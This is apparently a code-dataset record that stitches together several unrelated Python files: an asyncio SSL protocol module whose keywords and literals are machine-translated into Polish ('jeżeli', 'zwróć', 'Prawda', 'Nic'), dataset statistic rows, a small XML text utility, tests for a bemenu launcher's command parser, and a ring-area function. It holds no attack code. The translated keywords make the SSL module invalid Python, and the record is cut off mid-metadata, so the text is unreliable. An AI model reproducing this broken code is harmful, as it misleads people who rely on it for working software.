high-water limit. Setting high to zero forces low to zero as
well, oraz causes pause_writing() to be called whenever the
buffer becomes non-empty. Setting low to zero causes
resume_writing() to be called only once the buffer jest empty.
Use of zero dla either limit jest generally sub-optimal jako it
reduces opportunities dla doing I/O oraz computation
concurrently.
"""
self._ssl_protocol._transport.set_write_buffer_limits(high, low)
def get_write_buffer_size(self):
"""Return the current size of the write buffer."""
zwróć self._ssl_protocol._transport.get_write_buffer_size()
jeżeli nie data:
zwróć
self._ssl_protocol._write_appdata(data)
def can_write_eof(self):
"""Return Prawda jeżeli this transport supports write_eof(), Nieprawda jeżeli not."""
zwróć Nieprawda
def abort(self):
"""Close the transport immediately.
Buffered data will be lost. No more data will be received.
The protocol's connection_lost() method will (eventually) be
called przy Nic jako its argument.
"""
self._ssl_protocol._abort()
klasa SSLProtocol(protocols.Protocol):
"""SSL protocol.
Implementation of SSL on top of a socket using incoming oraz outgoing
buffers which are ssl.MemoryBIO objects.
"""
self._waiter = Nic
def connection_made(self, transport):
"""Called when the low-level connection jest made.
Start the SSL handshake.
"""
self._transport = transport
self._sslpipe = _SSLPipe(self._sslcontext,
self._server_side,
self._server_hostname)
self._start_handshake()
def connection_lost(self, exc):
"""Called when the low-level connection jest lost albo closed.
The argument jest an exception object albo Nic (the latter
meaning a regular EOF jest received albo the connection was
aborted albo closed).
"""
jeżeli self._session_established:
self._session_established = Nieprawda
self._loop.call_soon(self._app_protocol.connection_lost, exc)
self._transport = Nic
self._app_transport = Nic
def pause_writing(self):
"""Called when the low-level transport's buffer goes over
the high-water mark.
"""
self._app_protocol.pause_writing()
def resume_writing(self):
"""Called when the low-level transport's buffer drains below
the low-water mark.
"""
self._app_protocol.resume_writing()
def data_received(self, data):
"""Called when some SSL data jest received.
The argument jest a bytes object.
"""
spróbuj:
ssldata, appdata = self._sslpipe.feed_ssldata(data)
wyjąwszy ssl.SSLError jako e:
jeżeli self._loop.get_debug():
logger.warning('%r: SSL error %s (reason %s)',
self, e.errno, e.reason)
self._abort()
zwróć
dla chunk w ssldata:
self._transport.write(chunk)
dla chunk w appdata:
jeżeli chunk:
self._app_protocol.data_received(chunk)
inaczej:
self._start_shutdown()
przerwij
def eof_received(self):
"""Called when the other end of the low-level stream
jest half-closed.
If this returns a false value (including Nic), the transport
will close itself. If it returns a true value, closing the
transport jest up to the protocol.
"""
spróbuj:
jeżeli self._loop.get_debug():
logger.debug("%r received EOF", self)
self._wakeup_waiter(ConnectionResetError)
jeżeli nie self._in_handshake:
keep_open = self._app_protocol.eof_received()
jeżeli keep_open:
logger.warning('returning true z eof_received() '
'has no effect when using ssl')
w_końcu:
self._transport.close()
def _get_extra_info(self, name, default=Nic):
jeżeli name w self._extra:
zwróć self._extra[name]
inaczej:
zwróć self._transport.get_extra_info(name, default)
def _start_shutdown(self):
jeżeli self._in_shutdown:
zwróć
self._in_shutdown = Prawda
self._write_appdata(b'')
def _write_appdata(self, data):
self._write_backlog.append((data, 0))
self._write_buffer_size += len(data)
self._process_write_backlog()
def _start_handshake(self):
jeżeli self._loop.get_debug():
logger.debug("%r starts SSL handshake", self)
self._handshake_start_time = self._loop.time()
inaczej:
self._handshake_start_time = Nic
self._in_handshake = Prawda
# (b'', 1) jest a special value w _process_write_backlog() to do
# the SSL handshake
self._write_backlog.append((b'', 1))
self._loop.call_soon(self._process_write_backlog)
def _on_handshake_complete(self, handshake_exc):
self._in_handshake = Nieprawda
sslobj = self._sslpipe.ssl_object
spróbuj:
jeżeli handshake_exc jest nie Nic:
podnieś handshake_exc
peercert = sslobj.getpeercert()
jeżeli nie hasattr(self._sslcontext, 'check_hostname'):
# Verify hostname jeżeli requested, Python 3.4+ uses check_hostname
# oraz checks the hostname w do_handshake()
jeżeli (self._server_hostname
oraz self._sslcontext.verify_mode != ssl.CERT_NONE):
ssl.match_hostname(peercert, self._server_hostname)
wyjąwszy BaseException jako exc:
jeżeli self._loop.get_debug():
jeżeli isinstance(exc, ssl.CertificateError):
logger.warning("%r: SSL handshake failed "
"on verifying the certificate",
self, exc_info=Prawda)
inaczej:
logger.warning("%r: SSL handshake failed",
self, exc_info=Prawda)
self._transport.close()
jeżeli isinstance(exc, Exception):
self._wakeup_waiter(exc)
zwróć
inaczej:
podnieś
jeżeli self._loop.get_debug():
dt = self._loop.time() - self._handshake_start_time
logger.debug("%r: SSL handshake took %.1f ms", self, dt * 1e3)
# Add extra info that becomes available after handshake.
self._extra.update(peercert=peercert,
cipher=sslobj.cipher(),
compression=sslobj.compression(),
)
self._app_protocol.connection_made(self._app_transport)
self._wakeup_waiter()
self._session_established = Prawda
# In case transport.write() was already called. Don't call
# immediatly _process_write_backlog(), but schedule it:
# _on_handshake_complete() can be called indirectly from
# _process_write_backlog(), oraz _process_write_backlog() jest nie
# reentrant.
self._loop.call_soon(self._process_write_backlog)
def _process_write_backlog(self):
# Try to make progress on the write backlog.
jeżeli self._transport jest Nic:
zwróć
spróbuj:
dla i w range(len(self._write_backlog)):
data, offset = self._write_backlog[0]
jeżeli data:
ssldata, offset = self._sslpipe.feed_appdata(data, offset)
albo_inaczej offset:
ssldata = self._sslpipe.do_handshake(
self._on_handshake_complete)
offset = 1
inaczej:
ssldata = self._sslpipe.shutdown(self._finalize)
offset = 1
dla chunk w ssldata:
self._transport.write(chunk)
jeżeli offset < len(data):
self._write_backlog[0] = (data, offset)
# A short write means that a write jest blocked on a read
# We need to enable reading jeżeli it jest paused!
assert self._sslpipe.need_ssldata
jeżeli self._transport._paused:
self._transport.resume_reading()
przerwij
# An entire chunk z the backlog was processed. We can
# delete it oraz reduce the outstanding buffer size.
usuń self._write_backlog[0]
self._write_buffer_size -= len(data)
wyjąwszy BaseException jako exc:
jeżeli self._in_handshake:
# BaseExceptions will be re-raised w _on_handshake_complete.
self._on_handshake_complete(exc)
inaczej:
self._fatal_error(exc, 'Fatal error on SSL transport')
jeżeli nie isinstance(exc, Exception):
# BaseException
podnieś
def _fatal_error(self, exc, message='Fatal error on transport'):
# Should be called z exception handler only.
jeżeli isinstance(exc, (BrokenPipeError, ConnectionResetError)):
jeżeli self._loop.get_debug():
logger.debug("%r: %s", self, message, exc_info=Prawda)
inaczej:
self._loop.call_exception_handler({
'message': message,
'exception': exc,
'transport': self._transport,
'protocol': self,
})
jeżeli self._transport:
self._transport._force_close(exc)
def _finalize(self):
jeżeli self._transport jest nie Nic:
self._transport.close()
def _abort(self):
jeżeli self._transport jest nie Nic:
spróbuj:
self._transport.abort()
w_końcu:
self._finalize()
| 38.284866 | 93 | 0.610332 | zaimportuj collections
zaimportuj warnings
spróbuj:
zaimportuj ssl
wyjąwszy ImportError: # pragma: no cover
ssl = Nic
z . zaimportuj compat
z . zaimportuj protocols
z . zaimportuj transports
z .log zaimportuj logger
def _create_transport_context(server_side, server_hostname):
jeżeli server_side:
podnieś ValueError('Server side SSL needs a valid SSLContext')
# Client side may dalej ssl=Prawda to use a default
# context; w that case the sslcontext dalejed jest Nic.
# The default jest secure dla client connections.
jeżeli hasattr(ssl, 'create_default_context'):
# Python 3.4+: use up-to-date strong settings.
sslcontext = ssl.create_default_context()
jeżeli nie server_hostname:
sslcontext.check_hostname = Nieprawda
inaczej:
# Fallback dla Python 3.3.
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.options |= ssl.OP_NO_SSLv3
sslcontext.set_default_verify_paths()
sslcontext.verify_mode = ssl.CERT_REQUIRED
zwróć sslcontext
def _is_sslproto_available():
zwróć hasattr(ssl, "MemoryBIO")
# States of an _SSLPipe.
_UNWRAPPED = "UNWRAPPED"
_DO_HANDSHAKE = "DO_HANDSHAKE"
_WRAPPED = "WRAPPED"
_SHUTDOWN = "SHUTDOWN"
klasa _SSLPipe(object):
"""An SSL "Pipe".
An SSL pipe allows you to communicate przy an SSL/TLS protocol instance
through memory buffers. It can be used to implement a security layer dla an
existing connection where you don't have access to the connection's file
descriptor, albo dla some reason you don't want to use it.
An SSL pipe can be w "wrapped" oraz "unwrapped" mode. In unwrapped mode,
data jest dalejed through untransformed. In wrapped mode, application level
data jest encrypted to SSL record level data oraz vice versa. The SSL record
level jest the lowest level w the SSL protocol suite oraz jest what travels
as-is over the wire.
An SslPipe initially jest w "unwrapped" mode. To start SSL, call
do_handshake(). To shutdown SSL again, call unwrap().
"""
max_size = 256 * 1024 # Buffer size dalejed to read()
def __init__(self, context, server_side, server_hostname=Nic):
"""
The *context* argument specifies the ssl.SSLContext to use.
The *server_side* argument indicates whether this jest a server side albo
client side transport.
The optional *server_hostname* argument can be used to specify the
hostname you are connecting to. You may only specify this parameter if
the _ssl module supports Server Name Indication (SNI).
"""
self._context = context
self._server_side = server_side
self._server_hostname = server_hostname
self._state = _UNWRAPPED
self._incoming = ssl.MemoryBIO()
self._outgoing = ssl.MemoryBIO()
self._sslobj = Nic
self._need_ssldata = Nieprawda
self._handshake_cb = Nic
self._shutdown_cb = Nic
@property
def context(self):
"""The SSL context dalejed to the constructor."""
zwróć self._context
@property
def ssl_object(self):
"""The internal ssl.SSLObject instance.
Return Nic jeżeli the pipe jest nie wrapped.
"""
zwróć self._sslobj
@property
def need_ssldata(self):
"""Whether more record level data jest needed to complete a handshake
that jest currently w progress."""
zwróć self._need_ssldata
@property
def wrapped(self):
"""
Whether a security layer jest currently w effect.
Return Nieprawda during handshake.
"""
zwróć self._state == _WRAPPED
def do_handshake(self, callback=Nic):
"""Start the SSL handshake.
Return a list of ssldata. A ssldata element jest a list of buffers
The optional *callback* argument can be used to install a callback that
will be called when the handshake jest complete. The callback will be
called przy Nic jeżeli successful, inaczej an exception instance.
"""
jeżeli self._state != _UNWRAPPED:
podnieś RuntimeError('handshake w progress albo completed')
self._sslobj = self._context.wrap_bio(
self._incoming, self._outgoing,
server_side=self._server_side,
server_hostname=self._server_hostname)
self._state = _DO_HANDSHAKE
self._handshake_cb = callback
ssldata, appdata = self.feed_ssldata(b'', only_handshake=Prawda)
assert len(appdata) == 0
zwróć ssldata
def shutdown(self, callback=Nic):
"""Start the SSL shutdown sequence.
Return a list of ssldata. A ssldata element jest a list of buffers
The optional *callback* argument can be used to install a callback that
will be called when the shutdown jest complete. The callback will be
called without arguments.
"""
jeżeli self._state == _UNWRAPPED:
podnieś RuntimeError('no security layer present')
jeżeli self._state == _SHUTDOWN:
podnieś RuntimeError('shutdown w progress')
assert self._state w (_WRAPPED, _DO_HANDSHAKE)
self._state = _SHUTDOWN
self._shutdown_cb = callback
ssldata, appdata = self.feed_ssldata(b'')
assert appdata == [] albo appdata == [b'']
zwróć ssldata
def feed_eof(self):
"""Send a potentially "ragged" EOF.
This method will podnieś an SSL_ERROR_EOF exception jeżeli the EOF jest
unexpected.
"""
self._incoming.write_eof()
ssldata, appdata = self.feed_ssldata(b'')
assert appdata == [] albo appdata == [b'']
def feed_ssldata(self, data, only_handshake=Nieprawda):
"""Feed SSL record level data into the pipe.
The data must be a bytes instance. It jest OK to send an empty bytes
instance. This can be used to get ssldata dla a handshake initiated by
this endpoint.
Return a (ssldata, appdata) tuple. The ssldata element jest a list of
buffers containing SSL data that needs to be sent to the remote SSL.
The appdata element jest a list of buffers containing plaintext data that
needs to be forwarded to the application. The appdata list may contain
an empty buffer indicating an SSL "close_notify" alert. This alert must
be acknowledged by calling shutdown().
"""
jeżeli self._state == _UNWRAPPED:
# If unwrapped, dalej plaintext data straight through.
jeżeli data:
appdata = [data]
inaczej:
appdata = []
zwróć ([], appdata)
self._need_ssldata = Nieprawda
jeżeli data:
self._incoming.write(data)
ssldata = []
appdata = []
spróbuj:
jeżeli self._state == _DO_HANDSHAKE:
# Call do_handshake() until it doesn't podnieś anymore.
self._sslobj.do_handshake()
self._state = _WRAPPED
jeżeli self._handshake_cb:
self._handshake_cb(Nic)
jeżeli only_handshake:
zwróć (ssldata, appdata)
# Handshake done: execute the wrapped block
jeżeli self._state == _WRAPPED:
# Main state: read data z SSL until close_notify
dopóki Prawda:
chunk = self._sslobj.read(self.max_size)
appdata.append(chunk)
jeżeli nie chunk: # close_notify
przerwij
albo_inaczej self._state == _SHUTDOWN:
# Call shutdown() until it doesn't podnieś anymore.
self._sslobj.unwrap()
self._sslobj = Nic
self._state = _UNWRAPPED
jeżeli self._shutdown_cb:
self._shutdown_cb()
albo_inaczej self._state == _UNWRAPPED:
# Drain possible plaintext data after close_notify.
appdata.append(self._incoming.read())
wyjąwszy (ssl.SSLError, ssl.CertificateError) jako exc:
jeżeli getattr(exc, 'errno', Nic) nie w (
ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
jeżeli self._state == _DO_HANDSHAKE oraz self._handshake_cb:
self._handshake_cb(exc)
podnieś
self._need_ssldata = (exc.errno == ssl.SSL_ERROR_WANT_READ)
# Check dla record level data that needs to be sent back.
# Happens dla the initial handshake oraz renegotiations.
jeżeli self._outgoing.pending:
ssldata.append(self._outgoing.read())
zwróć (ssldata, appdata)
def feed_appdata(self, data, offset=0):
"""Feed plaintext data into the pipe.
Return an (ssldata, offset) tuple. The ssldata element jest a list of
buffers containing record level data that needs to be sent to the
remote SSL instance. The offset jest the number of plaintext bytes that
were processed, which may be less than the length of data.
NOTE: In case of short writes, this call MUST be retried przy the SAME
buffer dalejed into the *data* argument (i.e. the id() must be the
same). This jest an OpenSSL requirement. A further particularity jest that
a short write will always have offset == 0, because the _ssl module
does nie enable partial writes. And even though the offset jest zero,
there will still be encrypted data w ssldata.
"""
assert 0 <= offset <= len(data)
jeżeli self._state == _UNWRAPPED:
# dalej through data w unwrapped mode
jeżeli offset < len(data):
ssldata = [data[offset:]]
inaczej:
ssldata = []
zwróć (ssldata, len(data))
ssldata = []
view = memoryview(data)
dopóki Prawda:
self._need_ssldata = Nieprawda
spróbuj:
jeżeli offset < len(view):
offset += self._sslobj.write(view[offset:])
wyjąwszy ssl.SSLError jako exc:
# It jest nie allowed to call write() after unwrap() until the
# close_notify jest acknowledged. We zwróć the condition to the
# caller jako a short write.
jeżeli exc.reason == 'PROTOCOL_IS_SHUTDOWN':
exc.errno = ssl.SSL_ERROR_WANT_READ
jeżeli exc.errno nie w (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
podnieś
self._need_ssldata = (exc.errno == ssl.SSL_ERROR_WANT_READ)
# See jeżeli there's any record level data back dla us.
jeżeli self._outgoing.pending:
ssldata.append(self._outgoing.read())
jeżeli offset == len(view) albo self._need_ssldata:
przerwij
zwróć (ssldata, offset)
klasa _SSLProtocolTransport(transports._FlowControlMixin,
transports.Transport):
def __init__(self, loop, ssl_protocol, app_protocol):
self._loop = loop
self._ssl_protocol = ssl_protocol
self._app_protocol = app_protocol
self._closed = Nieprawda
def get_extra_info(self, name, default=Nic):
"""Get optional transport information."""
zwróć self._ssl_protocol._get_extra_info(name, default)
def close(self):
"""Close the transport.
Buffered data will be flushed asynchronously. No more data
will be received. After all buffered data jest flushed, the
protocol's connection_lost() method will (eventually) called
przy Nic jako its argument.
"""
self._closed = Prawda
self._ssl_protocol._start_shutdown()
# On Python 3.3 oraz older, objects przy a destructor part of a reference
# cycle are never destroyed. It's nie more the case on Python 3.4 thanks
# to the PEP 442.
jeżeli compat.PY34:
def __del__(self):
jeżeli nie self._closed:
warnings.warn("unclosed transport %r" % self, ResourceWarning)
self.close()
def pause_reading(self):
"""Pause the receiving end.
No data will be dalejed to the protocol's data_received()
method until resume_reading() jest called.
"""
self._ssl_protocol._transport.pause_reading()
def resume_reading(self):
"""Resume the receiving end.
Data received will once again be dalejed to the protocol's
data_received() method.
"""
self._ssl_protocol._transport.resume_reading()
def set_write_buffer_limits(self, high=Nic, low=Nic):
"""Set the high- oraz low-water limits dla write flow control.
These two values control when to call the protocol's
pause_writing() oraz resume_writing() methods. If specified,
the low-water limit must be less than albo equal to the
high-water limit. Neither value can be negative.
The defaults are implementation-specific. If only the
high-water limit jest given, the low-water limit defaults to a
implementation-specific value less than albo equal to the
high-water limit. Setting high to zero forces low to zero as
well, oraz causes pause_writing() to be called whenever the
buffer becomes non-empty. Setting low to zero causes
resume_writing() to be called only once the buffer jest empty.
Use of zero dla either limit jest generally sub-optimal jako it
reduces opportunities dla doing I/O oraz computation
concurrently.
"""
self._ssl_protocol._transport.set_write_buffer_limits(high, low)
def get_write_buffer_size(self):
"""Return the current size of the write buffer."""
zwróć self._ssl_protocol._transport.get_write_buffer_size()
def write(self, data):
"""Write some data bytes to the transport.
This does nie block; it buffers the data oraz arranges dla it
to be sent out asynchronously.
"""
jeżeli nie isinstance(data, (bytes, bytearray, memoryview)):
podnieś TypeError("data: expecting a bytes-like instance, got {!r}"
.format(type(data).__name__))
jeżeli nie data:
zwróć
self._ssl_protocol._write_appdata(data)
def can_write_eof(self):
"""Return Prawda jeżeli this transport supports write_eof(), Nieprawda jeżeli not."""
zwróć Nieprawda
def abort(self):
"""Close the transport immediately.
Buffered data will be lost. No more data will be received.
The protocol's connection_lost() method will (eventually) be
called przy Nic jako its argument.
"""
self._ssl_protocol._abort()
klasa SSLProtocol(protocols.Protocol):
"""SSL protocol.
Implementation of SSL on top of a socket using incoming oraz outgoing
buffers which are ssl.MemoryBIO objects.
"""
def __init__(self, loop, app_protocol, sslcontext, waiter,
server_side=Nieprawda, server_hostname=Nic):
jeżeli ssl jest Nic:
podnieś RuntimeError('stdlib ssl module nie available')
jeżeli nie sslcontext:
sslcontext = _create_transport_context(server_side, server_hostname)
self._server_side = server_side
jeżeli server_hostname oraz nie server_side:
self._server_hostname = server_hostname
inaczej:
self._server_hostname = Nic
self._sslcontext = sslcontext
# SSL-specific extra info. More info are set when the handshake
# completes.
self._extra = dict(sslcontext=sslcontext)
# App data write buffering
self._write_backlog = collections.deque()
self._write_buffer_size = 0
self._waiter = waiter
self._loop = loop
self._app_protocol = app_protocol
self._app_transport = _SSLProtocolTransport(self._loop,
self, self._app_protocol)
self._sslpipe = Nic
self._session_established = Nieprawda
self._in_handshake = Nieprawda
self._in_shutdown = Nieprawda
self._transport = Nic
def _wakeup_waiter(self, exc=Nic):
jeżeli self._waiter jest Nic:
zwróć
jeżeli nie self._waiter.cancelled():
jeżeli exc jest nie Nic:
self._waiter.set_exception(exc)
inaczej:
self._waiter.set_result(Nic)
self._waiter = Nic
def connection_made(self, transport):
"""Called when the low-level connection jest made.
Start the SSL handshake.
"""
self._transport = transport
self._sslpipe = _SSLPipe(self._sslcontext,
self._server_side,
self._server_hostname)
self._start_handshake()
def connection_lost(self, exc):
"""Called when the low-level connection jest lost albo closed.
The argument jest an exception object albo Nic (the latter
meaning a regular EOF jest received albo the connection was
aborted albo closed).
"""
jeżeli self._session_established:
self._session_established = Nieprawda
self._loop.call_soon(self._app_protocol.connection_lost, exc)
self._transport = Nic
self._app_transport = Nic
def pause_writing(self):
"""Called when the low-level transport's buffer goes over
the high-water mark.
"""
self._app_protocol.pause_writing()
def resume_writing(self):
"""Called when the low-level transport's buffer drains below
the low-water mark.
"""
self._app_protocol.resume_writing()
def data_received(self, data):
"""Called when some SSL data jest received.
The argument jest a bytes object.
"""
spróbuj:
ssldata, appdata = self._sslpipe.feed_ssldata(data)
wyjąwszy ssl.SSLError jako e:
jeżeli self._loop.get_debug():
logger.warning('%r: SSL error %s (reason %s)',
self, e.errno, e.reason)
self._abort()
zwróć
dla chunk w ssldata:
self._transport.write(chunk)
dla chunk w appdata:
jeżeli chunk:
self._app_protocol.data_received(chunk)
inaczej:
self._start_shutdown()
przerwij
def eof_received(self):
"""Called when the other end of the low-level stream
jest half-closed.
If this returns a false value (including Nic), the transport
will close itself. If it returns a true value, closing the
transport jest up to the protocol.
"""
spróbuj:
jeżeli self._loop.get_debug():
logger.debug("%r received EOF", self)
self._wakeup_waiter(ConnectionResetError)
jeżeli nie self._in_handshake:
keep_open = self._app_protocol.eof_received()
jeżeli keep_open:
logger.warning('returning true z eof_received() '
'has no effect when using ssl')
w_końcu:
self._transport.close()
def _get_extra_info(self, name, default=Nic):
jeżeli name w self._extra:
zwróć self._extra[name]
inaczej:
zwróć self._transport.get_extra_info(name, default)
def _start_shutdown(self):
jeżeli self._in_shutdown:
zwróć
self._in_shutdown = Prawda
self._write_appdata(b'')
def _write_appdata(self, data):
self._write_backlog.append((data, 0))
self._write_buffer_size += len(data)
self._process_write_backlog()
def _start_handshake(self):
jeżeli self._loop.get_debug():
logger.debug("%r starts SSL handshake", self)
self._handshake_start_time = self._loop.time()
inaczej:
self._handshake_start_time = Nic
self._in_handshake = Prawda
# (b'', 1) jest a special value w _process_write_backlog() to do
# the SSL handshake
self._write_backlog.append((b'', 1))
self._loop.call_soon(self._process_write_backlog)
def _on_handshake_complete(self, handshake_exc):
self._in_handshake = Nieprawda
sslobj = self._sslpipe.ssl_object
spróbuj:
jeżeli handshake_exc jest nie Nic:
podnieś handshake_exc
peercert = sslobj.getpeercert()
jeżeli nie hasattr(self._sslcontext, 'check_hostname'):
# Verify hostname jeżeli requested, Python 3.4+ uses check_hostname
# oraz checks the hostname w do_handshake()
jeżeli (self._server_hostname
oraz self._sslcontext.verify_mode != ssl.CERT_NONE):
ssl.match_hostname(peercert, self._server_hostname)
wyjąwszy BaseException jako exc:
jeżeli self._loop.get_debug():
jeżeli isinstance(exc, ssl.CertificateError):
logger.warning("%r: SSL handshake failed "
"on verifying the certificate",
self, exc_info=Prawda)
inaczej:
logger.warning("%r: SSL handshake failed",
self, exc_info=Prawda)
self._transport.close()
jeżeli isinstance(exc, Exception):
self._wakeup_waiter(exc)
zwróć
inaczej:
podnieś
jeżeli self._loop.get_debug():
dt = self._loop.time() - self._handshake_start_time
logger.debug("%r: SSL handshake took %.1f ms", self, dt * 1e3)
# Add extra info that becomes available after handshake.
self._extra.update(peercert=peercert,
cipher=sslobj.cipher(),
compression=sslobj.compression(),
)
self._app_protocol.connection_made(self._app_transport)
self._wakeup_waiter()
self._session_established = Prawda
# In case transport.write() was already called. Don't call
# immediatly _process_write_backlog(), but schedule it:
# _on_handshake_complete() can be called indirectly from
# _process_write_backlog(), oraz _process_write_backlog() jest nie
# reentrant.
self._loop.call_soon(self._process_write_backlog)
def _process_write_backlog(self):
# Try to make progress on the write backlog.
jeżeli self._transport jest Nic:
zwróć
spróbuj:
dla i w range(len(self._write_backlog)):
data, offset = self._write_backlog[0]
jeżeli data:
ssldata, offset = self._sslpipe.feed_appdata(data, offset)
albo_inaczej offset:
ssldata = self._sslpipe.do_handshake(
self._on_handshake_complete)
offset = 1
inaczej:
ssldata = self._sslpipe.shutdown(self._finalize)
offset = 1
dla chunk w ssldata:
self._transport.write(chunk)
jeżeli offset < len(data):
self._write_backlog[0] = (data, offset)
# A short write means that a write jest blocked on a read
# We need to enable reading jeżeli it jest paused!
assert self._sslpipe.need_ssldata
jeżeli self._transport._paused:
self._transport.resume_reading()
przerwij
# An entire chunk z the backlog was processed. We can
# delete it oraz reduce the outstanding buffer size.
usuń self._write_backlog[0]
self._write_buffer_size -= len(data)
wyjąwszy BaseException jako exc:
jeżeli self._in_handshake:
# BaseExceptions will be re-raised w _on_handshake_complete.
self._on_handshake_complete(exc)
inaczej:
self._fatal_error(exc, 'Fatal error on SSL transport')
jeżeli nie isinstance(exc, Exception):
# BaseException
podnieś
def _fatal_error(self, exc, message='Fatal error on transport'):
# Should be called z exception handler only.
jeżeli isinstance(exc, (BrokenPipeError, ConnectionResetError)):
jeżeli self._loop.get_debug():
logger.debug("%r: %s", self, message, exc_info=Prawda)
inaczej:
self._loop.call_exception_handler({
'message': message,
'exception': exc,
'transport': self._transport,
'protocol': self,
})
jeżeli self._transport:
self._transport._force_close(exc)
def _finalize(self):
jeżeli self._transport jest nie Nic:
self._transport.close()
def _abort(self):
jeżeli self._transport jest nie Nic:
spróbuj:
self._transport.abort()
w_końcu:
self._finalize()
| 4,533 | 0 | 212 |
cc8eeedb7d67215bfa1d6a760e871b3c51b0bb7e | 1,077 | py | Python | fme_server_lib/FMERepositoryUtility/XMLTextUtility.py | bcgov/fme | 0564363c59ccd06fe79459ec08ff3b7c5bf7e061 | [
"Apache-2.0"
] | null | null | null | fme_server_lib/FMERepositoryUtility/XMLTextUtility.py | bcgov/fme | 0564363c59ccd06fe79459ec08ff3b7c5bf7e061 | [
"Apache-2.0"
] | 2 | 2021-07-26T20:33:16.000Z | 2021-07-26T20:33:19.000Z | fme_server_lib/FMERepositoryUtility/XMLTextUtility.py | bcgov/fme | 0564363c59ccd06fe79459ec08ff3b7c5bf7e061 | [
"Apache-2.0"
] | null | null | null | from .RegSearch import RegSearch
| 29.916667 | 67 | 0.587744 | from .RegSearch import RegSearch
class XMLTextUtility:
def __init__(self, text=None, section_end=None):
self.text = text
self.section_end = section_end
def find_sections(self, head, include_cri, exclude_cri):
search = RegSearch(self.text, self.section_end)
return search.find_sections(head, include_cri, exclude_cri)
def find_lines(self, criteria):
search = RegSearch(self.text)
return search.find_lines(criteria)
@staticmethod
def sub_sections(sections, include_cri, exclude_cri):
result = list()
for section in sections:
search = RegSearch(section.text)
ok = True
for inc_cri in include_cri:
if not search.contain_line(inc_cri):
ok = False
if not ok:
continue
for exc_cri in exclude_cri:
if search.contain_line(exc_cri):
ok = False
if not ok:
continue
result.append(section)
return result
| 894 | 126 | 23 |
b91b37c602d7161bdb18fbb612ec1c44bdb5dd70 | 2,468 | py | Python | tests/test_main.py | flopraden/bemenu-extended | 0427ec101552cf62bd0ba98d0cb83699a99ce8de | [
"MIT"
] | 1 | 2020-03-01T19:15:43.000Z | 2020-03-01T19:15:43.000Z | tests/test_main.py | flopraden/bemenu-extended | 0427ec101552cf62bd0ba98d0cb83699a99ce8de | [
"MIT"
] | null | null | null | tests/test_main.py | flopraden/bemenu-extended | 0427ec101552cf62bd0ba98d0cb83699a99ce8de | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf8 -*-
import mock
import pytest
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
import bemenu_extended as d
menu = d.bemenu()
| 60.195122 | 182 | 0.651135 | #! /usr/bin/env python
# -*- coding: utf8 -*-
import mock
import pytest
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
import bemenu_extended as d
menu = d.bemenu()
def test_required_variables_available():
assert d.path_cache[-len('bemenu-extended'):] == 'bemenu-extended'
def test_command_to_list():
assert menu.command_to_list(['a', 'b', 'c']) == [u'a', u'b', u'c']
assert menu.command_to_list('a b c') == [u'a', u'b', u'c']
assert menu.command_to_list(['a', 'b c']) == [u'a', u'b', u'c']
assert menu.command_to_list(['a', 'b', 'c', 'aö']) == [u'a', u'b', u'c', u'a\xf6']
assert menu.command_to_list('a b c aö') == [u'a', u'b', u'c', u'a\xf6']
assert menu.command_to_list([u'a', u'b c aö']) == [u'a', u'b', u'c', u'a\xf6']
assert menu.command_to_list('xdg-open "/home/user/aö/"') == [u'xdg-open', u'/home/user/a\xf6/']
assert menu.command_to_list('xdg-open /home/user/aö/') == [u'xdg-open', u'/home/user/a\xf6/']
assert menu.command_to_list('xdg-open "/home/user/aö/filename"') == [u'xdg-open', u'/home/user/a\xf6/filename']
assert menu.command_to_list('xdg-open "/home/user/aö/file name"') == [u'xdg-open', u'/home/user/a\xf6/file name']
assert menu.command_to_list('xdg-open /home/user/aö/filename') == [u'xdg-open', u'/home/user/a\xf6/filename']
assert menu.command_to_list('xdg-open /home/user/aö/file name') == [u'xdg-open', u'/home/user/a\xf6/file', 'name']
assert menu.command_to_list('xdg-open "/home/user/aö/foldername/"') == [u'xdg-open', u'/home/user/a\xf6/foldername/']
assert menu.command_to_list('xdg-open "/home/user/aö/folder name/"') == [u'xdg-open', u'/home/user/a\xf6/folder name/']
assert menu.command_to_list('xdg-open /home/user/aö/folder name/') == [u'xdg-open', u'/home/user/a\xf6/folder', 'name/']
assert menu.command_to_list('xdg-open /home/user/aö/foldername/') == [u'xdg-open', u'/home/user/a\xf6/foldername/']
assert menu.command_to_list('xdg-open "/home/user/aö/"foldernam "e/"') == [u'xdg-open', u'/home/user/a\xf6/foldernam', u'e/']
assert menu.command_to_list('xdg-open "/home/user/1983 - BVerfG - Volkszahlungsurteil - 1983.pdf"') == [u'xdg-open', u'/home/user/1983 - BVerfG - Volkszahlungsurteil - 1983.pdf']
def test_scan_binaries_file_in_system_path():
with mock.patch.object(menu, 'system_path', new=lambda: [u'/bin', u'/bin/cp'] ):
assert type(menu.scan_binaries()) == list
| 2,186 | 0 | 69 |
05663d5ebabfab987aea80e85ceb98316e7f9363 | 223 | py | Python | individual_22.py | HeartAttack417/labs2 | efc13855ebb2b096b08edf4215d054a097d1a257 | [
"MIT"
] | null | null | null | individual_22.py | HeartAttack417/labs2 | efc13855ebb2b096b08edf4215d054a097d1a257 | [
"MIT"
] | null | null | null | individual_22.py | HeartAttack417/labs2 | efc13855ebb2b096b08edf4215d054a097d1a257 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from math import pi
print(ring_area(5, 3))
| 14.866667 | 38 | 0.475336 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from math import pi
def ring_area(R, r):
area = 'Error'
if 0 <= r <= R:
area = pi * (R ** 2 - r ** 2)
return area
print(ring_area(5, 3))
| 96 | 0 | 25 |
1e7cd5441d75e159ca18198c76eb7e5786a50c12 | 1,869 | py | Python | ants.py | doug-letough/ants | feab4ae6857fa21d0f9addaf46fcccd7a20cd940 | [
"WTFPL"
] | null | null | null | ants.py | doug-letough/ants | feab4ae6857fa21d0f9addaf46fcccd7a20cd940 | [
"WTFPL"
